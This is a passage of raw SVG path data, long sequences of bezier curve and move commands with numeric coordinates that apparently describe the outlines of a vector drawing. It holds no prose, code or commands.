1010.6592,325.72464 1010.4361,324.7695 1009.8536,324.40949 C 1009.1263,323.96001 1008.9748,325.98652 1009.37,330.87747 C 1009.9471,338.01895 1009.6713,339.69032 1008.5162,336.05103 z M 1052.0153,335.30902 C 1052.0237,334.86406 1052.4668,333.825 1053,333 C 1053.8354,331.70731 1053.9715,331.73371 1053.9847,333.19098 C 1053.9931,334.12102 1053.55,335.16008 1053,335.5 C 1052.45,335.83992 1052.0069,335.75398 1052.0153,335.30902 z M 988,328.7154 C 988,326.99059 984.74962,325.96383 980.72568,326.41752 C 979.1998,326.58956 977.72289,326.36065 977.44365,325.90883 C 977.16442,325.45702 976.34746,325.31317 975.62819,325.58918 C 974.08815,326.18015 972.33126,324.30105 971.84502,321.54284 C 971.65526,320.4664 970.77693,318.84334 969.89318,317.93602 C 968.86752,316.88301 968.325,314.69746 968.39318,311.89318 L 968.5,307.5 L 972.15671,307.66073 C 974.92407,307.78237 975.9282,307.38256 976.28534,306.01685 C 976.55459,304.98726 978.10281,303.91669 979.8903,303.52409 C 981.76074,303.11328 984.07394,301.45854 985.63036,299.41798 C 987.06422,297.53809 988.69411,296 989.25234,296 C 990.39183,296 994.99689,290.94411 994.99878,289.69098 C 994.99945,289.24602 995.41157,289.13633 995.91459,289.44721 C 996.41761,289.7581 997.05709,289.44716 997.33564,288.75623 C 997.72505,287.79033 997.86035,287.8054 997.92105,288.82143 C 998.01725,290.43167 999.79444,292.28444 1002.7706,293.87725 C 1005.6839,295.4364 1005.5852,296.27809 1002.1039,299.56396 C 999.49044,302.03061 999.31092,302.60018 1000.2648,305.39872 C 1000.8462,307.10442 1001.9244,308.85986 1002.6609,309.29969 C 1004.6851,310.50852 1004.2696,311.82261 1001.75,312.18045 C 1000.2171,312.39815 999.46361,313.22187 999.38582,314.76491 C 999.32302,316.01061 998.34551,317.83304 997.21358,318.81477 C 996.08164,319.79649 995.19141,321.25228 995.23529,322.04986 C 995.49902,326.84357 994.90289,328.87174 993.25,328.80433 C 992.2875,328.76508 990.7125,329.06619 989.75,329.47347 C 988.53242,329.98869 988,329.75805 988,328.7154 z M 1028.7012,327.3679 C 1027.2951,325.96173 1028.0595,325 1030.5833,325 C 1032.2053,325 1033.0118,325.46517 1032.7505,326.25 C 1032.2691,327.69569 1029.73,328.39668 1028.7012,327.3679 z M 1034.6732,326.59065 C 1033.8809,324.52616 1034.8702,324 1039.5442,324 C 1042.097,324 1044.2532,324.60018 1045.0201,325.52417 C 1046.6887,327.53481 1045.6738,328.431 1043.2171,327.1162 C 1042.1423,326.54099 1041.0913,326.21623 1040.8815,326.39451 C 1040.6717,326.57278 1039.3094,327.00375 1037.8543,327.35221 C 1036.0521,327.78377 1035.0378,327.54096 1034.6732,326.59065 z M 938.07895,326.2587 C 938.03553,325.57598 936.71085,323.77598 935.13521,322.2587 C 933.55958,320.74141 931.9381,318.375 931.53193,317 L 930.79343,314.5 L 932.64672,316.83977 C 933.66602,318.12665 935.55071,320.48702 936.83491,322.08504 C 938.11911,323.68306 938.94214,325.55516 938.66386,326.24527 C 938.26681,327.2299 938.1409,327.23279 938.07895,326.2587 z M 963,324.57332 C 963,323.64569 963.855,323 965.08333,323 C 967.52038,323 967.1759,325.33677 964.66713,325.82332 C 963.68037,326.0147 963,325.50456 963,324.57332 z M 1027.5,323 C 1027.1601,322.45 1025.7835,322 1024.441,322 C 1023.0984,322 1022,321.55 1022,321 C 1022,320.45 1023.7579,320 1025.9064,320 C 1029.3204,320 1029.7468,320.25206 1029.2897,322 C 1028.6995,324.25708 1028.3854,324.43259 1027.5,323 z M 1100,322 C 1100,321.45 1100.9266,321 1102.059,321 C 1103.1915,321 1103.8399,321.45 1103.5,322 C 1102.6976,323.29836 1100,323.29836 1100,322 z M 1041.5,321 C 1041.1601,320.45 1041.8085,320 1042.941,320 C 1044.0734,320 1045,320.45 1045,321 C 1045,322.29836 1042.3024,322.29836 1041.5,321 z M 1033.3149,319.62186 C 1033.6057,318.86388 1033.3164,317.68263 1032.6719,316.99686 C 1031.7759,316.04356 1031.7772,315.64778 1032.6775,315.31582 C 1033.404,315.04795 1033.656,313.65505 1033.3354,311.67921 C 1032.9428,309.25988 1033.3288,308.01243 1034.914,306.57785 C 1037.3004,304.4182 1038.9526,305.14722 1037.0011,307.49873 C 1035.911,308.81222 1035.9825,308.94395 1037.4749,308.37126 C 1038.9739,307.79605 1039.0752,307.99097 1038.1631,309.69517 C 1037.3817,311.15523 1037.4177,312.03456 1038.2968,312.9592 C 1039.2579,313.97015 1039.0069,314.07518 1037.049,313.48123 C 1034.6142,312.74254 1034.6093,312.75472 1036.3024,315.33872 C 1037.711,317.4886 1037.7459,317.83972 1036.5033,317.3629 C 1034.7025,316.67187 1034.522,318.12203 1036.2,319.8 C 1037.1333,320.73333 1036.8873,321 1035.093,321 C 1033.5439,321 1032.9597,320.54729 1033.3149,319.62186 z M 265.25,318.28172 C 263.84614,317.77814 263.54789,314.39745 264.83703,313.60072 C 265.90893,312.93825 270,315.77375 270,317.17915 C 270,317.81262 269.31374,317.68822 268.30804,316.87244 C 267.34416,316.09059 266.92086,316.00816 267.32435,316.6809 C 268.15357,318.06346 267.03912,318.9235 265.25,318.28172 z M 1062.029,318.03906 C 1061.2199,317.52739 1060.8931,316.77356 1061.3028,316.3639 C 1061.7124,315.95423 1062.8083,316.37976 1063.7381,317.30952 C 1065.5455,319.11691 1064.4635,319.57873 1062.029,318.03906 z M 271,317.55902 C 271,317.31648 271.45,316.83992 272,316.5 C 272.55,316.16008 273,316.35852 273,316.94098 C 273,317.52344 272.55,318 272,318 C 271.45,318 271,317.80156 271,317.55902 z M 608.54271,314.0691 C 608.22627,313.5571 608.42472,312.85554 608.98369,312.51008 C 609.54266,312.16462 610,312.58352 610,313.44098 C 610,315.19751 609.39994,315.45614 608.54271,314.0691 z M 927.78167,311.05797 C 926.84514,309.96419 926.46015,308.83364 926.92614,308.54565 C 928.00802,307.87701 930.30262,310.59215 929.83676,311.98971 C 929.64299,312.57104 928.71819,312.15176 927.78167,311.05797 z M 33.5,308 C 33.160081,307.45 33.358524,307 33.940983,307 C 34.523442,307 35,307.45 35,308 C 35,309.28138 34.291939,309.28138 33.5,308 z M 923,306 C 922.20686,305.50981 921.88989,304.77678 922.29563,304.37104 C 922.70137,303.9653 923.55833,304.15833 924.2,304.8 C 925.71091,306.31091 924.86759,307.15423 923,306 z M 1026,302 C 1026,301.45 1026.45,301 1027,301 C 1027.55,301 1028,301.45 1028,302 C 1028,302.55 1027.55,303 1027,303 C 1026.45,303 1026,302.55 1026,302 z M 965,301.05902 C 965,300.54148 965.45,299.83992 966,299.5 C 966.55,299.16008 967,299.58352 967,300.44098 C 967,301.29844 966.55,302 966,302 C 965.45,302 965,301.57656 965,301.05902 z M 1030,300.05902 C 1030,299.54148 1030.45,298.83992 1031,298.5 C 1031.55,298.16008 1032,298.58352 1032,299.44098 C 1032,300.29844 1031.55,301 1031,301 C 1030.45,301 1030,300.57656 1030,300.05902 z M 1006.5,296 C 1007.2997,294.70609 1009,294.70609 1009,296 C 1009,296.55 1008.2984,297 1007.441,297 C 1006.5835,297 1006.1601,296.55 1006.5,296 z M 1023.25,293.32558 C 1021.8962,292.38119 1020.9939,290.70933 1020.9847,289.12803 C 1020.9741,287.31851 1020.7074,286.91324 1020.1282,287.82679 C 1019.6656,288.55653 1018.435,289.00653 1017.3935,288.82679 C 1016.0962,288.6029 1015.5437,289.05105 1015.6389,290.25 C 1015.7153,291.2125 1015.1225,292 1014.3215,292 C 1012.1445,292 1013.6377,287.94933 1016.792,285.29835 C 1018.5347,283.83365 1019.7945,283.41446 1020.5555,284.04602 C 1022.2856,285.48195 1026.7554,281.35536 1025.1782,279.77817 C 1024.2739,278.87394 1024,278.87902 1024,279.8 C 1024,280.46 1023.19,281 1022.2,281 C 1021.21,281 1019.8568,281.54321 1019.1929,282.20714 C 1018.25,283.15 1017.6041,283.03262 1016.2429,281.67098 C 1014.718,280.14569 1014.6876,279.80905 1016,278.97915 C 1017.2787,278.17055 1017.2418,278.02837 1015.75,278.01531 C 1013.991,277.99992 1013.599,276.43157 1013.959,270.84917 C 1014.053,269.39121 1013.7157,267.94233 1013.2094,267.62943 C 1012.7012,267.31531 1012.5004,268.16661 1012.761,269.53026 C 1013.0207,270.88862 1012.7824,272 1012.2316,272 C 1010.8717,272 1007.7839,267.15871 1008.4531,266.07583 C 1008.7481,265.59861 1008.3195,263.92382 1007.5009,262.35408 C 1005.6171,258.74219 1005.6189,257.23826 1007.5092,255.34795 C 1008.3392,254.5179 1008.7684,253.43434 1008.4629,252.94005 C 1008.1575,252.44575 1008.374,251.16978 1008.944,250.10455 C 1009.7698,248.56168 1010.5418,248.32631 1012.7403,248.94726 C 1014.2581,249.37598 1015.3717,250.2856 1015.2149,250.96863 C 1015.0581,251.65167 1015.4347,252.81882 1016.0517,253.5623 C 1016.892,254.57475 1016.8155,255.42533 1015.7471,256.95068 C 1014.9625,258.07081 1014.0985,258.76514 1013.827,258.49364 C 1013.5555,258.22214 1013.3333,258.675 1013.3333,259.5 C 1013.3333,260.325 1013.7083,261 1014.1667,261 C 1014.625,261 1015,261.675 1015,262.5 C 1015,263.84976 1017.2382,264.43621 1021.75,264.26865 C 1023.375,264.2083 1023.375,266.68204 1021.75,267.33772 C 1020.7887,267.72563 1020.8023,267.86034 1021.809,267.92105 C 1022.529,267.96447 1022.8399,268.45 1022.5,269 C 1022.1495,269.56716 1022.9896,270 1024.441,270 C 1025.9834,270 1027,270.5634 1027,271.41821 C 1027,272.19823 1027.2731,273.54823 1027.607,274.41821 C 1028.0108,275.47052 1027.6563,276 1026.548,276 C 1025.6317,276 1025.1646,276.45734 1025.5101,277.01631 C 1025.8555,277.57528 1026.5571,277.77373 1027.0691,277.45729 C 1027.5811,277.14086 1028,277.80852 1028,278.94098 C 1028,280.07344 1028.3999,281 1028.8887,281 C 1029.3775,281 1030.0678,282.54806 1030.4228,284.44012 C 1031.133,288.22596 1030.2417,293.26744 1028.9981,292.49883 C 1028.5644,292.23079 1027.9515,292.6839 1027.6362,293.50574 C 1026.9258,295.35699 1026.1144,295.32366 1023.25,293.32558 z M 1021,274.05902 C 1021,273.54148 1020.55,272.83992 1020,272.5 C 1019.45,272.16008 1019,272.58352 1019,273.44098 C 1019,274.29844 1019.45,275 1020,275 C 1020.55,275 1021,274.57656 1021,274.05902 z M 1018.2672,271.08625 C 1018.6062,269.78989 1018.1599,269.01357 1016.8838,268.67987 C 1015.8477,268.40892 1015,268.59511 1015,269.09362 C 1015,269.59213 1015.45,270 1016,270 C 1016.55,270 1017,270.47656 1017,271.05902 C 1017,271.64148 1016.55,271.83992 1016,271.5 C 1015.45,271.16008 1015,271.35852 1015,271.94098 C 1015,273.7961 1017.7464,273.0776 1018.2672,271.08625 z M 1010,293 C 1010,291.70609 1011.7003,291.70609 1012.5,293 C 1012.8399,293.55 1012.4165,294 1011.559,294 C 1010.7016,294 1010,293.55 1010,293 z M 997,285.2274 C 997,284.66779 998.1449,283.15019 999.54422,281.85496 C 1000.9435,280.55973 1002.795,278.18536 1003.6585,276.57859 C 1005.0348,274.01783 1005.3463,273.8675 1006.1821,275.36085 C 1006.9222,276.6834 1006.3933,277.78489 1003.8177,280.2847 C 999.06931,284.89351 997,286.39372 997,285.2274 z M 910,277 C 910,276.45 910.45,276 911,276 C 911.55,276 912,276.45 912,277 C 912,277.55 911.55,278 911,278 C 910.45,278 910,277.55 910,277 z M 910.70217,274.32712 C 910.35722,273.76897 910.60329,271.55454 911.24901,269.40615 C 912.28925,265.94511 912.46115,265.78927 912.75753,268.0385 C 913.15359,271.0442 911.6038,275.78598 910.70217,274.32712 z M 1006.6395,273.30615 C 1005.5133,272.17996 1005.9536,271 1007.5,271 C 1008.325,271 1009,271.42344 1009,271.94098 C 1009,273.20196 1007.4384,274.10508 1006.6395,273.30615 z M 773.66667,271.33333 C 772.3691,270.03577 773.02842,269.27605 775.25,269.50891 C 778.54631,269.85443 778.64394,269.93761 777,271 C 775.21113,272.15606 774.555,272.22167 773.66667,271.33333 z M 376,268 C 376,266.71862 376.70806,266.71862 377.5,268 C 377.83992,268.55 377.64148,269 377.05902,269 C 376.47656,269 376,268.55 376,268 z M 1093,267.55902 C 1093,267.31648 1093.45,266.83992 1094,266.5 C 1094.55,266.16008 1095,266.35852 1095,266.94098 C 1095,267.52344 1094.55,268 1094,268 C 1093.45,268 1093,267.80156 1093,267.55902 z M 372.01118,266.75 C 371.86753,266.3375 371.67456,265.6625 371.58235,265.25 C 371.49015,264.8375 370.82655,262.78235 370.10769,260.683 C 368.80676,256.88377 369.04987,255.29475 370.76947,256.35752 C 371.26586,256.66431 371.58899,257.94687 371.48754,259.20766 C 371.38609,260.46845 371.72426,261.77589 372.23903,262.11309 C 372.75381,262.45029 372.97189,263.80029 372.72367,265.11309 C 372.47545,266.42589 372.15483,267.1625 372.01118,266.75 z M 502.66667,262.33333 C 502.3,261.96667 502,261.20167 502,260.63333 C 502,260.00673 502.46577,260.06577 503.18333,260.78333 C 503.83417,261.43417 504.13417,262.19917 503.85,262.48333 C 503.56583,262.7675 503.03333,262.7 502.66667,262.33333 z M 505,258 C 505,257.45 505.45,257 506,257 C 506.55,257 507,257.45 507,258 C 507,258.55 506.55,259 506,259 C 505.45,259 505,258.55 505,258 z M 497,255.11803 C 497,254.56803 497.45,253.83992 498,253.5 C 498.55,253.16008 499,253.33197 499,253.88197 C 499,254.43197 498.55,255.16008 498,255.5 C 497.45,255.83992 497,255.66803 497,255.11803 z M 313.23564,251.69194 C 310.29291,250.37886 310.38642,249 313.41821,249 C 316.36427,249 319,249.93985 319,250.99036 C 319,252.32044 315.57765,252.73698 313.23564,251.69194 z M 334,251.86833 C 334,251.12716 332.63324,250.91998 330.03912,251.26793 C 327.42554,251.61848 325.70826,251.3534 324.99056,250.48862 C 323.61979,248.83695 325.16939,247.74403 327.5738,248.66669 C 328.77147,249.12628 329.09867,248.96867 328.60503,248.16994 C 328.19772,247.5109 328.4536,246.96552 329.19098,246.92105 C 330.19772,246.86034 330.21135,246.72563 329.25,246.33772 C 326.41788,245.19494 328.32314,244.11702 333.10965,244.1541 C 338.62691,244.19684 343.88609,245.9529 345.95205,248.44222 C 346.66311,249.299 347.07729,250.03885 346.87244,250.08632 C 346.6676,250.1338 344.26773,250.30562 341.53939,250.46815 C 338.81106,250.63068 336.41106,251.26683 336.20606,251.88183 C 335.71955,253.34134 334,253.33082 334,251.86833 z M 350,250.5 C 350,249.5 351,249 353,249 C 355,249 356,249.5 356,250.5 C 356,251.5 355,252 353,252 C 351,252 350,251.5 350,250.5 z M 38.923489,248.75847 C 38.32945,246.75166 38.36845,245.02187 39.031938,243.94832 C 39.704187,242.8606 40.124656,242.85857 41.423785,243.93675 C 42.290703,244.65623 43,245.53154 43,245.8819 C 43,246.50283 39.075534,249.27212 38.923489,248.75847 z M 313.36163,243.5 C 313.71562,242.57751 313.35972,242 312.43723,242 C 311.61223,242 310.67821,241.325 310.36163,240.5 C 310.04504,239.675 308.73573,239 307.45203,239 C 306.16833,239 304.82524,238.52625 304.46738,237.94721 C 304.10951,237.36818 303.29546,237.08144 302.65836,237.31001 C 302.02126,237.53858 300.28665,237.11326 298.80366,236.36486 C 296.41157,235.15768 295.71624,235.23487 292.64164,237.04893 C 288.53748,239.47044 287.07567,238.21699 290.38171,235.11113 C 292.26523,233.34165 293.99045,232.90958 299.55057,232.81483 C 303.92098,232.74036 306.53821,233.11462 306.78302,233.84906 C 306.99403,234.48208 307.77352,235 308.51522,235 C 309.25693,235 313.5609,236.84486 318.07961,239.09969 C 327.24222,243.67181 327.25609,244.95864 318.14301,244.98469 C 313.78834,244.99713 312.89372,244.71934 313.36163,243.5 z M 35.738972,241.55108 C 34.782537,240.85172 34,240.03375 34,239.73338 C 34,238.94453 37.937504,240.08986 38.531896,241.05161 C 39.433003,242.50963 37.518178,242.85207 35.738972,241.55108 z M 327.22894,240.81318 C 327.72722,239.31834 330,238.49529 330,239.80968 C 330,240.34667 329.2874,241.05947 328.41644,241.39369 C 327.44253,241.76742 326.98536,241.54393 327.22894,240.81318 z M 30.5,239 C 30.160081,238.45 30.331966,238 30.881966,238 C 31.431966,238 32.160081,238.45 32.5,239 C 32.839919,239.55 32.668034,240 32.118034,240 C 31.568034,240 30.839919,239.55 30.5,239 z M 294,238.5 C 294,237.58333 294.5625,237.02083 295.25,237.25 C 296.66567,237.72189 296.51005,239.32998 295,239.83333 C 294.45,240.01667 294,239.41667 294,238.5 z M 25,237 C 25,236.45 25.701558,236 26.559017,236 C 27.416476,236 27.839919,236.45 27.5,237 C 26.700321,238.29391 25,238.29391 25,237 z M 1008.2405,236.01357 C 1006.4856,233.2034 1006.6663,232.12626 1009.5209,228.38378 C 1012.6697,224.25538 1015.2317,224.70527 1013.9535,229.16216 C 1012.806,233.16307 1010.6404,238 1009.9964,238 C 1009.713,238 1008.9228,237.10611 1008.2405,236.01357 z M 325.63617,235.50574 C 325.95154,234.6839 326.61976,234.265 327.1211,234.57484 C 328.16968,235.2229 327.32792,237 325.97237,237 C 325.47209,237 325.3208,236.32758 325.63617,235.50574 z M 322.18333,233.78333 C 321.5325,233.1325 321,232.20786 321,231.72857 C 321,231.24929 321.72857,231.58571 322.61905,232.47619 C 323.50952,233.36667 324.04202,234.29131 323.80238,234.53095 C 323.56274,234.7706 322.83417,234.43417 322.18333,233.78333 z M 311.89953,229.7173 C 310.85161,228.91908 310.54037,227.81032 310.998,226.50571 C 311.62858,224.70807 311.86093,224.83039 313.37414,227.75662 C 315.12133,231.1353 314.62592,231.79402 311.89953,229.7173 z M 318.01531,227.97076 C 318.00689,227.12968 317.1,225.79284 316,225 C 314.9,224.20716 314,222.93404 314,222.17083 C 314,221.15905 313.25511,220.96715 311.25,221.46235 C 309.43686,221.91015 308.84068,221.80521 309.5,221.15434 C 311.35374,219.32434 314.21683,219.46919 315.36736,221.45116 C 315.99031,222.5243 317.28491,224.0993 318.24424,224.95116 C 319.49667,226.06328 319.71246,226.92295 319.00956,228 C 318.14376,229.32665 318.02886,229.32327 318.01531,227.97076 z M 1034.2292,221.8125 C 1034.4469,221.15938 1035.1597,220.44677 1035.8132,220.22894 C 1036.5439,219.98536 1036.7674,220.44253 1036.3937,221.41644 C 1035.6962,223.23415 1033.6292,223.61236 1034.2292,221.8125 z M 530.59656,217.15623 C 530.25051,216.59631 530.45466,215.83704 531.05022,215.46896 C 532.5877,214.51875 533.57969,215.82031 532.2962,217.1038 C 531.57802,217.82198 531.01868,217.83923 530.59656,217.15623 z M 526.66667,216.33333 C 525.40539,215.07205 526.00357,214 527.96862,214 C 529.30765,214 529.75315,214.47971 529.36163,215.5 C 528.746,217.10429 527.74664,217.41331 526.66667,216.33333 z M 535,216.19112 C 535,214.98122 538.03905,211 538.96262,211 C 540.17339,211 537.75162,215.86627 536.25,216.45072 C 535.5625,216.7183 535,216.60148 535,216.19112 z M 1039.5,215 C 1039.8399,214.45 1040.568,214 1041.118,214 C 1041.668,214 1041.8399,214.45 1041.5,215 C 1041.1601,215.55 1040.432,216 1039.882,216 C 1039.332,216 1039.1601,215.55 1039.5,215 z M 523,214.05902 C 523,213.47656 523.45,213 524,213 C 525.28138,213 525.28138,213.70806 524,214.5 C 523.45,214.83992 523,214.64148 523,214.05902 z M 1043.5433,208.07002 C 1043.2568,207.60657 1043.9174,206.99335 1045.0112,206.70731 C 1046.1051,206.42127 1047,206.54697 1047,206.98663 C 1047,208.16156 1044.1516,209.05429 1043.5433,208.07002 z M 525.27083,199.39583 C 525.60312,199.06354 526.46563,199.02802 527.1875,199.31689 C 527.98523,199.63611 527.74828,199.87307 526.58333,199.92105 C 525.52917,199.96447 524.93854,199.72813 525.27083,199.39583 z M 1029,197 C 1029,196.45 1029.675,196 1030.5,196 C 1031.325,196 1032,196.45 1032,197 C 1032,197.55 1031.325,198 1030.5,198 C 1029.675,198 1029,197.55 1029,197 z M 495.51008,182.01631 C 495.16462,181.45734 495.58352,181 496.44098,181 C 498.19751,181 498.45614,181.60006 497.0691,182.45729 C 496.5571,182.77373 495.85554,182.57528 495.51008,182.01631 z M 485.27083,179.39583 C 485.60312,179.06354 486.46562,179.02802 487.1875,179.31689 C 487.98523,179.63611 487.74828,179.87307 486.58333,179.92105 C 485.52917,179.96447 484.93854,179.72813 485.27083,179.39583 z M 1111,153.5 C 1111.6847,152.675 1112.9508,152 1113.8136,152 C 1115.0694,152 1114.9951,152.29285 1113.4411,153.4682 C 1110.9015,155.38905 1109.4162,155.4084 1111,153.5 z M 1128,141.55902 C 1128,141.31648 1128.45,140.83992 1129,140.5 C 1129.55,140.16008 1130,140.35852 1130,140.94098 C 1130,141.52344 1129.55,142 1129,142 C 1128.45,142 1128,141.80156 1128,141.55902 z M 1130.5703,138.11369 C 1130.269,137.62622 1131.0103,136.96907 1132.2176,136.65335 C 1134.7376,135.99437 1135.485,136.40618 1134.5411,137.93347 C 1133.7418,139.2268 1131.326,139.33644 1130.5703,138.11369 z M 1224,133 C 1224,132.45 1224.7016,132 1225.559,132 C 1226.4165,132 1226.8399,132.45 1226.5,133 C 1225.7003,134.29391 1224,134.29391 1224,133 z M 1228.125,133.125 C 1228.5432,131.87026 1230,131.57891 1230,132.75 C 1230,133.1625 1229.4938,133.66875 1228.875,133.875 C 1228.2562,134.08125 1227.9188,133.74375 1228.125,133.125 z M 1216,132 C 1216,130.71862 1216.7081,130.71862 1217.5,132 C 1217.8399,132.55 1217.6415,133 1217.059,133 C 1216.4766,133 1216,132.55 1216,132 z M 121.19876,128.89007 C 117.58839,125.36026 117.81896,124 122.02763,124 C 124.20972,124 124.79257,124.37699 124.35866,125.50772 C 124.04045,126.33697 124.51495,128.13697 125.4131,129.50772 C 127.81197,133.16886 125.18078,132.78323 121.19876,128.89007 z M 1235.6649,131.00033 C 1236.8717,130.51372 1239.0844,130.50374 1240.6649,130.97776 C 1243.1146,131.71251 1242.8203,131.83116 1238.5,131.85066 C 1234.6799,131.8679 1234.0109,131.66724 1235.6649,131.00033 z M 1191.5,129 C 1191.1601,128.45 1191.557,128 1192.382,128 C 1193.207,128 1194.1601,128.45 1194.5,129 C 1194.8399,129.55 1194.443,130 1193.618,130 C 1192.793,130 1191.8399,129.55 1191.5,129 z M 1256.4243,128.08368 C 1258.3694,125.93429 1260,125.36693 1260,126.83948 C 1260,127.3012 1258.7712,128.23886 1257.2693,128.92317 C 1254.5454,130.16424 1254.5433,130.16213 1256.4243,128.08368 z M 0,125.5 C 0,124.675 0.675,124 1.5,124 C 2.325,124 3,124.675 3,125.5 C 3,126.325 2.325,127 1.5,127 C 0.675,127 0,126.325 0,125.5 z M 1168.9985,121.45361 C 1167.55,120.65197 1167.1304,120.06241 1168,120.05075 C 1169.7862,120.02679 1172.6423,121.69104 1171.9695,122.3638 C 1171.7096,122.6237 1170.3727,122.21411 1168.9985,121.45361 z M 305,118.12244 C 305,116.70496 307.82392,114.77314 308.91252,115.44594 C 310.47276,116.41021 309.00117,119 306.89301,119 C 305.85186,119 305,118.6051 305,118.12244 z M 43.302767,114.43753 C 41.629599,113.17518 41.733638,112.98697 44.75,111.81946 C 46.5375,111.1276 48,110.21018 48,109.78076 C 48,109.35134 49.097033,109 50.437851,109 C 54.39153,109 53.324839,112.56902 48.845249,114.32865 C 45.680565,115.57178 44.828336,115.58852 43.302767,114.43753 z M 1.25,104.34923 C -1.0748323,103.38973 -0.018750877,101.865 2.75,102.18358 C 4.2625,102.35761 5.5,102.94384 5.5,103.4863 C 5.5,104.61955 3.0904039,105.10879 1.25,104.34923 z M 425.5201,102.75814 C 423.5545,101.74973 421.39587,101.01492 420.72314,101.12523 C 417.64492,101.62998 413.23796,99.29637 409.05627,94.947279 C 399.67274,85.188122 397.59231,82.451024 397.31502,79.5 C 396.92043,75.300593 398.12457,73.908758 402.34185,73.689619 C 405.02525,73.550184 405.99222,73.05247 405.99552,71.809017 C 405.99798,70.878976 405.55,69.839919 405,69.5 C 404.45,69.160081 404,69.302274 404,69.815983 C 404,71.264136 398.28733,72.059739 395.49957,70.999837 C 392.64745,69.915464 392.44777,69.137481 394.35284,66.532138 C 395.54812,64.897503 396.21407,64.811059 400.07057,65.789945 C 402.47126,66.399304 404.63436,66.698975 404.87745,66.45588 C 405.12055,66.212785 403.90487,65.730975 402.17595,65.385191 C 400.44703,65.039407 399.27672,64.361282 399.57525,63.878246 C 400.27198,62.750909 399.72873,62.77244 396.49962,64.000143 C 392.8794,65.376549 390.39574,63.872993 390.5479,60.397092 C 390.68995,57.152103 388.30234,53.94675 386.31205,54.710495 C 385.54544,55.004672 384.9899,54.852656 385.07753,54.372681 C 385.51766,51.961783 384.7658,51 382.44098,51 C 381.03352,51 380.12893,50.600406 380.43077,50.112013 C 380.73262,49.62362 378.84667,48.853104 376.23979,48.399756 C 370.08455,47.329334 350.85018,47.256304 352.34851,48.309044 C 354.09993,49.539603 344.91881,47.978529 341.5,46.464461 C 339.85,45.733736 337.6,44.948844 336.5,44.720255 C 334.66417,44.338756 334.70522,44.215254 337,43.215706 C 339.43974,42.15302 339.41564,42.123551 336,41.993101 C 334.075,41.919582 331.66887,41.532366 330.65305,41.132621 C 326.16025,39.364621 333.50234,37.45144 349,36.351825 C 356.11095,35.847278 359.849,34 353.75902,34 C 347.98147,34 348.44828,32.256332 354.56583,30.986333 C 357.64186,30.347752 359.97412,29.640783 359.74862,29.41529 C 359.07042,28.737086 348.42965,30.959901 342.36342,33.046989 C 339.24134,34.121145 335.4636,35 333.96845,35 C 329.29032,35 325,36.197708 325,37.50368 C 325,39.16584 319.45212,41.4 315.32464,41.4 C 313.34757,41.4 312.52342,41.713924 313.26459,42.184687 C 314.10799,42.720381 313.86537,42.996536 312.5,43.054972 C 310.55494,43.138219 310.55311,43.16137 312.43362,43.897783 C 314.02361,44.520426 314.11268,44.812325 312.93482,45.540283 C 312.14699,46.027192 310.82686,46.477845 310.0012,46.541735 C 309.17554,46.605626 307.15,46.752889 305.5,46.868987 L 302.5,47.080075 L 305.25,48.571975 C 311.3919,51.904013 307.60268,53.049898 288.70346,53.575749 C 281.11536,53.786879 275.11117,53.631208 275.36082,53.229811 C 275.61046,52.828415 273.13922,52.653336 269.86916,52.840747 C 263.46867,53.207566 260.11295,51.773758 262.01319,49.484104 C 263.41397,47.796267 261.22663,47.026813 254.66821,46.90032 C 248.002,46.771748 244.01863,45.724552 245.86206,44.585251 C 246.6001,44.129115 252.16015,44.077137 258.21772,44.469744 C 266.0857,44.979688 269.03876,44.871735 268.55673,44.091788 C 268.18561,43.491304 267.15852,43 266.27432,43 C 265.39011,43 264.97926,42.687406 265.36132,42.305346 C 265.74338,41.923287 263.68088,40.874252 260.77799,39.974157 C 257.71983,39.025921 255.61449,37.818021 255.77221,37.102191 C 255.92192,36.422703 255.24692,35.955183 254.27221,36.063256 C 251.76208,36.341572 246,34.897433 246,33.99001 C 246,31.873173 252.95634,29.170394 260,28.550529 C 261.925,28.381123 266.17274,27.699387 269.43942,27.035561 C 272.7061,26.371734 276.6436,26.014231 278.18942,26.241109 C 279.73524,26.467987 281,26.315817 281,25.902954 C 281,25.490091 284.4875,24.917609 288.75,24.630771 C 293.0125,24.343933 302.125,23.609461 309,22.998612 C 316.50395,22.33188 328.49447,22.152013 339,22.548589 C 362.3386,23.429605 363.85879,23.529506 368.48333,24.486139 C 371.84196,25.180902 372.15562,25.442053 370.48333,26.15131 C 369.35659,26.629192 370.8754,26.670193 374,26.246245 C 377.025,25.83581 385.0125,25.502203 391.75,25.504896 C 398.4875,25.507589 404,25.124681 404,24.653989 C 404,24.183297 406.5875,23.912549 409.75,24.052326 C 420.23354,24.515682 425.66381,24.084022 424,22.919572 C 422.92735,22.168857 425.70512,21.980846 433.75,22.259652 C 439.9375,22.474087 445,22.278389 445,21.824767 C 445,20.579921 488.77178,20.870665 494,22.150238 C 496.475,22.755978 499.85,23.195885 501.5,23.127809 C 503.15,23.059732 505.85,23.414447 507.5,23.916064 C 509.23566,24.443721 509.73156,24.864319 508.67668,24.914047 C 507.4897,24.970002 506.97957,25.610758 507.21499,26.75 C 507.43582,27.818606 508.34045,28.40159 509.53831,28.247256 C 520.92338,26.780401 535.31438,26.602273 541,27.857831 C 544.36119,28.600085 544.22238,28.682305 537.5,29.930932 C 533.65,30.646039 528.5303,32.079122 526.12288,33.115563 C 523.71547,34.152003 520.56547,35.031628 519.12288,35.070285 C 516.7989,35.132561 516.72792,35.230391 518.5,35.928749 C 520.21666,36.605266 520.00415,36.824475 517,37.476061 C 515.075,37.893584 513.11446,38.463525 512.64324,38.742597 C 511.42362,39.464895 514.09988,40.96651 516.63922,40.984687 C 517.81578,40.993109 519.71429,41.7875 520.85812,42.75 C 522.68996,44.291445 522.77068,44.720489 521.53544,46.350138 C 520.16482,48.158386 517.40498,47.771775 518.54271,45.930902 C 518.85914,45.418906 517.44148,45 515.39235,45 C 511.92225,45 511.12545,45.880629 514.15837,46.363807 C 514.89627,46.481362 516.4,47.094571 517.5,47.726493 C 519.0722,48.629683 519.24007,49.138 518.2848,50.102923 C 517.33009,51.067283 517.43726,51.609713 518.7848,52.633399 C 520.35367,53.82523 520.30537,53.939107 518.21862,53.968197 C 516.96385,53.985688 515.67821,54.675 515.36163,55.5 C 515.04504,56.325 513.59667,57.001026 512.14301,57.00228 C 509.89767,57.004218 509.48398,57.455603 509.39352,60.00228 C 509.33495,61.651026 509.67245,63 510.14352,63 C 511.47409,63 511.15163,66.629265 509.71514,67.821446 C 509.00847,68.407931 505.29597,69.999415 501.46514,71.358076 C 494.93728,73.673283 492.34564,74.203202 481,75.542642 C 473.68952,76.4057 471.66345,77.032807 468.5,79.411628 C 465.12162,81.952071 